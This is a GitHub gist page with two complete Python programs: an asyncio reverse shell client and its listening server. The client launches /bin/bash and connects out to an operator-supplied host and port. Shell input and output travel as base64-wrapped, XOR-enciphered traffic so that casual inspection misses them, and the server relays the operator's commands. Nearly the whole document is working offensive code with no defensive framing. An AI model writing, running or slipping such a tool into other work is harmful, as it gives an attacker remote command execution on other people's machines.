Last active
May 12, 2024 02:41
-
-
Save NoraCodes/ac6e84afaecfeebe3a32acebcf6c8aec to your computer and use it in GitHub Desktop.
Asynchronous Reverse Shell and Server in Python using asyncio
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
""" | |
An async server for base64-encoded reverse shells | |
Allows rashell-cipher clients to connect and get commands | |
Expects network data in base64 wrapping xor enciphered data | |
The XOR key in this script needs to match the client key. | |
Written by Leo Tindall / SilverWingedSeraph | |
This code is covered by a CC-BY-SA 4.0 license. | |
Give attribution and share under the same license. | |
""" | |
import asyncio | |
import sys | |
from base64 import b64decode, b64encode | |
def sprint(*args): | |
print("[*S] ", *args) | |
key = b"default" | |
# XOR encipherment and decipherment is entirely symmetric; xor(xor(data, key), key) == data | |
def xor(data, key): | |
import math | |
if len(key) < len(data): | |
localkey = key * math.ceil(len(data) / len(key)) | |
else: | |
localkey = key | |
return bytearray(a ^ b for a, b in zip(*map(bytearray, [data, localkey]))) | |
def got_stdin_data(q): | |
'''Handler for data coming in on stdin. | |
Simply writes it into the async queue to be sent to the client.''' | |
asyncio.async(q.put(sys.stdin.readline())) | |
class ReverseShellServerProtocol(asyncio.Protocol): | |
''' | |
Async protocol for a reverse shell. It's a basic | |
network pipe that connects stdin and stdout to a bi- | |
directional network connection. | |
''' | |
def connection_made(self, transport): | |
# Print client info for logging purpouses | |
sprint("Incoming connection from: {}".format( | |
transport.get_extra_info('peername'))) | |
# Connect the transport | |
self.transport = transport | |
# Get a future for data coming from the queue | |
fut = asyncio.async(q.get()) | |
# When that future is done (i.e., there is | |
# data in the queue), call write_reply() | |
# to write that data to the client | |
fut.add_done_callback(self.write_reply) | |
def data_received(self, data): | |
# Decode the data recieved from the network | |
decoded = b64decode(data) | |
# Decipher the data and turn it into a string | |
message = xor(decoded, key).decode() | |
# end='' is used to prevent double/unneded newlines | |
print(message, end='') | |
def write_reply(self, fut): | |
# This function is called when the future is | |
# ready; so getting fut.result() will return. | |
reply = fut.result() | |
# Encipher and then encode the information | |
# to write to the client, and do so. | |
self.transport.write( | |
b64encode( | |
xor(reply.encode(), key) | |
) | |
) | |
# Re-set the callback so this function | |
# will be called again. | |
fut = asyncio.async(q.get()) | |
fut.add_done_callback(self.write_reply) | |
# q is the queue used for messages sent to clients | |
q = asyncio.Queue() | |
loop = asyncio.get_event_loop() | |
# This call connects data from sys.stdin to the got_stdin_data | |
# function/callback | |
loop.add_reader(sys.stdin, got_stdin_data, q) | |
# Create and run the server. The coro is a coroutine that | |
# contains the server, but it has to be connected to a loop | |
# in order to run. | |
coro = loop.create_server(ReverseShellServerProtocol, | |
'0.0.0.0', int(sys.argv[1])) | |
server = loop.run_until_complete(coro) | |
sprint("Serving on {}".format(sys.argv[1])) | |
try: | |
loop.run_forever() | |
except KeyboardInterrupt: | |
pass | |
# Close the server | |
server.close() | |
loop.run_until_complete(server.wait_closed()) | |
loop.close() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
""" | |
An async reverse shell implementation | |
Exec a process (default: /bin/bash) and hook up | |
stdout and stdin to network sockets | |
with base64 encoding and trivial (xor) encryption | |
(WHOSE KEY YOU SHOULD CHANGE) | |
Written by Leo Tindall / SilverWingedSeraph | |
This code is covered by a CC-BY-SA 4.0 license. | |
Give attribution and share under the same license. | |
""" | |
import asyncio | |
from base64 import b64encode, b64decode | |
import subprocess | |
import sys | |
key = b"default" | |
def xor(data, key): | |
import math | |
if len(key) < len(data): | |
localkey = key * math.ceil(len(data) / len(key)) | |
else: | |
localkey = key | |
return bytearray(a ^ b for a, b in zip(*map(bytearray, [data, localkey]))) | |
def cprint(*args): | |
print("[*C] ", *args) | |
class LocalShellProtocol(asyncio.SubprocessProtocol): | |
def __init__(self, queue, loop): | |
self.q = queue | |
def pipe_data_received(self, fd, data): | |
self.q.put_nowait(data) | |
class ReverseShellClientProtocol(asyncio.Protocol): | |
def connection_made(self, transport): | |
self.transport = transport | |
fut = asyncio.async(q.get()) | |
fut.add_done_callback(self.write_reply) | |
def data_received(self, data): | |
message = xor(b64decode(data), key) | |
shellt.get_pipe_transport(0).write(message) | |
def write_reply(self, fut): | |
reply = fut.result() | |
message = b64encode(xor(reply, key)) | |
self.transport.write(message) | |
fut = asyncio.async(q.get()) | |
fut.add_done_callback(self.write_reply) | |
q = asyncio.Queue() | |
loop = asyncio.get_event_loop() | |
shellc = loop.subprocess_exec( | |
lambda: LocalShellProtocol(q, loop), | |
'/bin/bash', | |
stdout=subprocess.PIPE, | |
stderr=subprocess.PIPE, | |
stdin=subprocess.PIPE, | |
) | |
shellt, shellp = loop.run_until_complete(shellc) | |
try: | |
coro = loop.create_connection(ReverseShellClientProtocol, | |
sys.argv[1], int(sys.argv[2])) | |
client = loop.run_until_complete(coro) | |
except ConnectionRefusedError: | |
print("Connection to {}:{} refused.".format(sys.argv[1], sys.argv[2])) | |
loop.close() | |
exit(1) | |
try: | |
loop.run_forever() | |
except KeyboardInterrupt: | |
pass | |
client.close() | |
loop.run_until_complete(client.wait_closed()) | |
loop.close() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment